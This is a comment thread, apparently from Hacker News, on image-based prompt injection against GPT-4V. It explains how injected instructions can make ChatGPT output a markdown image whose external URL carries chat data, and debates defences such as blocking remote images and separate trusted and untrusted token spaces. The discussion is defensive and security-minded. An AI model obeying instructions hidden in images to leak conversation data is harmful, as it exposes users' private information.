I'm still a bit surprised at the visual acuity of GPT-4V. The spatial resolution is far finer than I thought we were at right now- for instance, if you had asked me what I thought a model would return as far as a description of the pumpkin weigh scene goes, I'd have said "crowd of people, cameras, chart, house" etc- you know, like YOLOv8 level of identification.
But it gets down to picking up numbers and letters that are tiny, gets obscured text like half moon bay (is it using a combination of the scene letters and knowledge in its language model of a pumpkin contest in HMB and synthesizing that knowledge into recognizing the location!!!!???). It's damn detailed.
At first I just thought it was able taking an array of objects identified in the photo with bounding box coordinates and then just figuring out what the answer is.
But then i asked it to describe Worf’s hands in this image and it did a great job.
I don't think that's the right way to think about it.
It's not running an OCR-style algorithm to export data and then passing that data to the LLM for further processing.
Instead, the model itself has been trained on both text and images at the same time.
So the image features end up as a weird ball of floating point numbers mixed together with the floating point numbers for the textual representation of the words in the prompt.
I'd love to understand this more. Strings of text get tokenized into a sequence of integer tokens - is there a similar tokenization step for image inputs? What does that look like?
The entire GPT4 model was not retrained to utilize images, instead I think it is much more like show in [1] where an extra layer(s) are learned that take another pretrained image model and map that model to the latent space of the LLM. In [1] this was just a single linear layer. I found it pretty shocking how simple it was. I believe OpenAI is doing something similar.
I wonder if OpenAI themselves even know how the resulting black box actually operates? They know how to train it, sure, but do they understand how it approaches the end results?
When they launched GPT-4 back in March they talked about its image capabilities - I think they trained it into the model from the start, but then spent several extra months on additional safety research, as described in their paper: https://cdn.openai.com/papers/GPTV_System_Card.pdf
I don't think they have trained the model from scratch on images too, but more like Flamingo or similar methods, and the LLM model is at most finetuned but not trained from scratch.
If the model was trained from scratch then I would expect it to be able to develop new emergent behavior like being much better at ascii art, SVG, OpenSCAD scripting at least in the case the model was trained on the usual masked objective but not only on text tokens but image tokens too.
It's fun to ask it to try to draw ascii art based on an image. It barely draws anything resembling the original image, but usually gets the concepts in the original image accurately.
> I was really surprised to see this work: I had assumed OpenAI would block Markdown images like this from loading content from external servers.
Everyone always is because why on earth wouldn't this be blocked?
That wuzzie has contacted OpenAI about this multiple times and gotten companies like Microsoft to say, "you know what, 3rd-party images are things that nobody allows in most contexts and it shouldn't be enabled in places like Bing chat" and OpenAI in particular seems to have consistently decided that it's a core part of the chat capabilities for some reason -- it's on of the reasons why I say that OpenAI does not take security seriously.
It really should not be a debate whether or not remote images should be blocked from markdown. Your email client blocks remote images. Most forums either block remote images or proxy them. There is no reason at all for ChatGPT to have that the ability to display them.
Every company makes security mistakes, that's not a problem; it's when a company doubles down on security mistakes that their attitude about security becomes apparent.
I use it all the time to embed graphviz diagrams by instructing it to url-encode them and include it in the query string to a rendering endpoint. It spooked me enough that I added proxy layer to verify that it’s not rendering what appears to be a chat or PII.
The world isn’t ready for LLMs unleashed like this. Any plugin could do the same thing, and exfiltrate any part of the chat context with very little instruction engineering to bypass what things guardrails exist on the plugins side.
Thanks for the shout out, the last answer I got from OpenAI in that regards was that they thought it wouldn't be a problem because there will be mitigations. My assumption now is that they thought they could maybe fix indirect prompt injection, but it doesn't look like there is a solution.
My conclusion is that with LLMs, the assumption always needs to be that the LLM might be capable of outputting any content, and the client needs to safely handle whatever is returned.
Yes. The remote image is not the leak. The URL request is the leak.
If this is confusing, control the server and have it return an image, or 404 instead of an image, doesn't matter, while logging the request.
You will find the exfiltrated data in the request log, and you will not find an image in the request log.
Of course, if your request handler is an image generator, you can generate an image containing your URL request. But by the time your generator gets the request, the data was leaked.
The URL request is the browser request for the URL placed in the src tag of the image. The exfiltration technique is an image request. What the server returns as a response to that request doesn't matter. It doesn't even need to return anything at all.
If remote images were blocked from markdown as they are in many other applications, the URL request would not be made by the browser. The mitigation is that ChatGPT should refuse to render image tags or make requests for images if given a 3rd-party URL. I'm not sure if we're talking past each other or what, but I'm not talking about whether the server returns an image. I'm saying, ChatGPT will request an image from an external domain as part of rendering markdown during a conversation, and that GET request can be used as an exfiltration method.
The response from the server has nothing to do with it. I'm talking about the fact that ChatGPT will request arbitrary URLs without user input if the URLs are formatted in a markdown block as an image src.
This post broke my brain a little as it goes totally against my mental model of how an LLM is processing images. That is, I don't know why it is processing the content of the image, and then running that through something that then "executes" the text of the image.
So it has some pipeline like -> LLM/OCR Image to Text -> Text to Command Processing. Why is the text description of the image being processed at all and not simply just being output?
As far as I know, we've had engines for detecting sentiment, objects, etc from images for a long time (way before ChatGPT), and they didn't have issues where they would execute a URL found in an image, they would just output the characters...
Can someone who understands this better explain wth is going on here?
Interesting that you say that, because this lines up exactly with my mental models of LLM image processing and LLM functioning in general. One of the defining features of LLMs is that, unlike in regular programming, there's no separation between data and instructions -- they're one and the same -- and that's what we're seeing here. Also, LLMs tend to focus more heavily on the instructions they see last (because of limitations in the attention mechanism, I think? But IIRC nobody has come up with a full explanation yet), and that's what we're seeing here too.
So the original release of ChatGPT would call a URL you entered in the chat? I don't recall it acting that way. In the linked post ChatGPT literally goes to a URL from an image... i.e. it calls something like curl with that URL. This definitely seems like something adjacent to an LLM.
The exfiltration demo in the blog post doesn't show ChatGPT fetching a URL: it shows it outputting an image tag with an src= pointing at an external URL, which the user's browser then attempts to load.
This is the biggest problem in cyber security. You can tell someone to NEVER give out their TFA code over the phone and they will still do it when prompted by a phone call from their boss.
I love simonw content. It's like a day after I saw something interesting on X wrt AI, I can trust that there will be an article a day later by simonw where he tried the things I would have wanted to try and explains them nicely. Thanks for that!
Same sentiment. Its like he reads hacker news or similar sources and is generally on top of tech news and then has the curiosity to look more into it himself and do practical experiments. I try to do the same which is why I love this content.
I feel differently. I think Simon's wasting his talents on an evolutionary dead end. If transformers and LLMs held the answer, self-driving cars would be getting better.
As a daily user of LLMs for over a year, I'm confident that they're not a waste of my time.
Even if development were to freeze, they didn't improve at all from this day onwards, and their many monumental flaws (prompt injection, hallucination, inability to reason etc) were never solved, I still think they'd be worth studying and using.
I expect we could still spend years figuring out new capabilities in the models we already have access to today.
I'm very glad that you are focusing and helping educate the industry (both from pure tech but also security aspects). And agreed that as a daily user of LLMs myself, the potential (and practical use cases already) are enormous. E.g. Writing code and rapid prototyping will never be the same for me.
By the way the last official answer I got from OpenAI regarding the markdown issue was that they thought it wouldn't be a problem because there will be mitigations. My assumption now is that they thought they could maybe fix indirect prompt injection, but it doesn't look like there is a solution.
My current takeaway is that with LLMs, the assumption always needs to be that the LLM is capable of outputting any content, and the client needs to safely (and securely) handle whatever is returned.
Btw. I show cased these kind of image based prompt injections in July (with Bard and Bing Chat, which presumably already used OpenAI's tech), and the example I created (the robot slipping on a banana) was shown during Blackhat in Las Vegas this year. Tweets: https://twitter.com/wunderwuzzi23/status/1681520761146834946
Simon is bullish about LLMs, but his writing has been incredibly valuable regardless of which side of the LLM fence you're on. There are a limited number of authors describing injection attacks in accessible, detailed, accurate ways, and Simon has done a lot to raise awareness about these attacks.
In addition, the fact that Simon is very bullish about LLMs makes his writing on LLM attacks more effective, because a decent chunk of people warning about LLM attacks are also skeptical about the long-term viability of the technology or think that it's over-hyped, so LLM fans tend to to dismiss them as being "anti-AI" and say that they're playing up the dangers. Nobody can make that claim about Simon.
For whatever reason Simon's writing has consistently attracted a lot more attention than other researcher releases about LLM attacks; and what has he done with that popularity and outsized attention? He's raised awareness about the issue and pointed back to some of that research!
I just don't think the criticism in this case is warranted, I think Simon's writing here is worthwhile regardless of how anyone feels about the potential of LLMs. Whether they're the future or not, these vulnerabilities exist today in products that are being rolled out today. That's worth taking about if LLMs aren't the future, but it's even more worth talking about if LLMs are the future.
self-driving cars already in production are not explainable, at least with llm in it, we know what the network is thinking, and thus are possible to figure out what went wrong
It sure seems that a lot of effort goes in to preventing the LLM from obeying the user while actual security issues-- like allowing CSRF like attacks from the interface-- go ignored.
If the LLM embedding content from arbitrary sources is really such a critical feature it could at least be behind a click that shows you the URL.
Not my field but I'd assume they had encoded tokens extracted from an image differently than prompt tokens, so they wouldn't get interpreted as a command.
Why aren't they doing this? Or are they, it's just failing?
> If you can crack differentiating between "command" tokens and other input tokens, you've cracked prompt injection!
Isn't this simple? Have two different tokenizer with non-overlapping output ranges, one for “trusted commands” and one for “user input”, do training with various mixes of commands and input with the appropriate reactions to each, and then have the trusted command fixed (or selectable from a small set of preselected options/payterns based on interaction style [chat might used trusted tokens to indicate which participant each piece of the exchange is from, as well as for the internal system prompt, for instance]) for external users and allow them to freely specify only input that gets sent to the “untrusted input” tokenizer. Even if you allow pretokenized input, you can sanitize it to accept only tokens from the untrusted space.
Every time I talk about prompt injection the same "surely there's an easy fix: ...." comments show up. I'm just trying to shortcut having to argue against them all again.
No, while sometimes there are barriers that take a giant leap to cross, progress tends to involveots of steps that were simple, even if time consuming to execute, once the preceding pieces were in place.
After over a year of hearing people say this, at some point the burden of proof shifts to the people making the claim.
There was a period where LLMs were extremely inaccessible to train where it would have been reasonable to say "the mitigation is easy, but OpenAI hasn't done it." But nowadays, indie models and freeware models are much more common, and there are even models with open datasets. Fine tuning can be done on a Macbook. Purchasing compute to fully replicate a smaller model is within reach of a lot of people.
There is still a cost involved, it's not trivial -- but it's a lot more accessible than it used to be. So at what point is it reasonable to respond to the people saying, "it's easy, just do X" with "well, do it then."?
If the training method you're describing works, then what is preventing someone from training a 7B model over the next week that's invulnerable to prompt injection?
> If you can crack differentiating between "command" tokens and other input tokens, you've cracked prompt injection!
In my opinion there exists a rather simple semi-solution (and no, I do not claim to have cracked prompt injection! :-) ): the user is able to mark parts of his input as "trusted" or "untrusted", and the AI is implemented to handle data this way.
For example, the user would mark his prompt (that he thoroughly thought through) as "trusted", but the image which provides additional information, or is the object to run the prompt on, as "untrusted".
This is related to established concepts in IT security:
- W^X: memory pages are either writable or executable, but not both (of course the term "W^X" is a little bit confusing since if W=0 and X=0, W^X is 0, but is an allowed configuration) - corresponding to untrusted or trusted parts of the prompt
- sandboxing of the virtual machine in browsers that execute untrusted data from the web (untrusted part)
> the user is able to mark parts of his input as "trusted" or "untrusted", and the AI is implemented to handle data this way.
That's exactly the solution I've been hoping for, but seeing as no-one has even come close to getting that to work yet my current intuition is that it's REALLY hard. Maybe even impossible with current LLM architectures?
I don't think its an architecture (on the high level; there are probably architecture details like the specifics of the tokenizer that need adaptation in a straightforward way) problem, I think its a training/dataset generation/labelling problem.
That is, I think it is both simple and incredibly expensive/arduous, because the masses of free data to train models on doesn't come with a command-space/untrusted-input-space dichotomy, that’s something you have to impose onto the training data, with appropriately differentiated completions.
(On top of the fact that it likely requires de novo model training, which is itself expensive.)
First is that the straightforward way to implement any changes to the data structure requires full retraining of the model from scratch, which is very expensive for the large models (I recall reading that GPT-4 training compute cost was sixty million or so) - so it's not something someone would or could do 'for fun' just to test a hypothesis, there needs to be a will to explicitly make the next large model in this manner, because you don't want to make two models at twice the cost.
The second almost all of the training is based on self-supervised data from generic text where there are neither "instructions" or "data", the concepts don't even make sense while you're training on a book or wikipedia article. So all the pretraining would learn to ignore that out-of-band marker, and then you'd have only the RLHF instruction data to try and make some use of it, and you'd need expensive manual review to make this training data - the current RLHF data is much less intensive to annotate because it effectively has just "good"/"bad" signal, and even that can be gathered for free from users; however, this training data would need someone to explicitly annotate what is the prompt and what is data when a user submits a text "please rewrite the grammar for the following paragraph: [... some data copied from internet ..]", you can't magically get that metadata, and it's expensive to annotate a lot of that.
TL;DR; - IMHO it's not difficult, but it is resource consuming, and that fully explains why it's not done.
But I still don't see how that form of RLHF could be fully, mechanistically reliable, which is what you'd need here. Current RLHF drastically lowers the likelihood of the LLM generating objectionable content, but it doesn't drop it to zero, because LLMs need to be highly pliant and suggestible to be useful and that leaves a window of opportunity for bad actors. How would this be any different?
> Anyone who can build an API to an LLM that was provably secure against prompt injection would have a license to print money right now.
Well, if you could create software that is provably secure against at least a large class of cyberattacks, you could also make quite some money, since I know that at least the finance industry would be willing to pay a lot of money for it (source: in the past, I had an opportunity to talk someone who is very knowledgable about software in the finance sector, and I asked him some questions about exactly this topic).
Thus: we have not solved the "cyberinjection" problem for completely conventional software for decades. So I don't believe that we suddenly have the capabilities to solve this problem for LLMs.
But: As I pointed out, people have come up with ideas that make cyberattacks much harder. Here, I can imagine that their ideas could be used to make prompt injections a lot more complicated.
Additionally, we know from decades of experience that making insecure software secure is nigh impossible. Instead, one has to architect around security properties from beginning. The same does, in my opinion, also hold for LLMs and prompt injection.
Despite paying it a lot of lip service, in practice companies demonstrate that they don't really care about security that much, so I don't think that resistance to prompt injection is the main blocker for any products right now; if some product was very useful but had issues with prompt injection, then people would complain a lot about it while still using it and paying for it; and security (much less the even more niche requirement of provable security) would only be a differentiator among multiple competitors providing a comparable product, not a barrier for selling the product in the first place.
I think prompt injection is the main reason there's been buzz about the idea of autonomous agents and digital personal assistants for months but no one has released a convincing product yet.
If you use the GPT API you can just define your own system prompt… but it’s not as useful as you’d hope. The API isn’t particularly censored to begin with; that’s mostly ChatGPT
> and the AI is implemented to handle data this way.
This is the key issue. The problem is, I don't see how to reliably create that data handling implementation -- it always comes down to the fact that any feasible implementation takes the form of text that gets passed to the AI, and clever prompt hacking can override the instructions in that text.
Right, exactly. As I said in another comment on this thread, one of the defining features of LLMs is that there's no separation between data and instructions -- and I don't think there's any way to fix that within the current LLM paradigm.
Perhaps I'm very naive in the ways of how these multi-modal LLMs work, I admit not having had time to look into how they're glued together.
I imagined simply tagging the tokens as command and data, ie say instead of just (43) as a token, it's (43, 1) for command and (43, 0) for data. Then ensure through adverserial training that whatever interprets say images does not spit out command tokens.
edit: or better yet, just have it spit ut plain tokens like (43) and ensure they're data tokens by manually converting them to data tokens (43, 0).
But it gets down to picking up numbers and letters that are tiny, gets obscured text like half moon bay (is it using a combination of the scene letters and knowledge in its language model of a pumpkin contest in HMB and synthesizing that knowledge into recognizing the location!!!!???). It's damn detailed.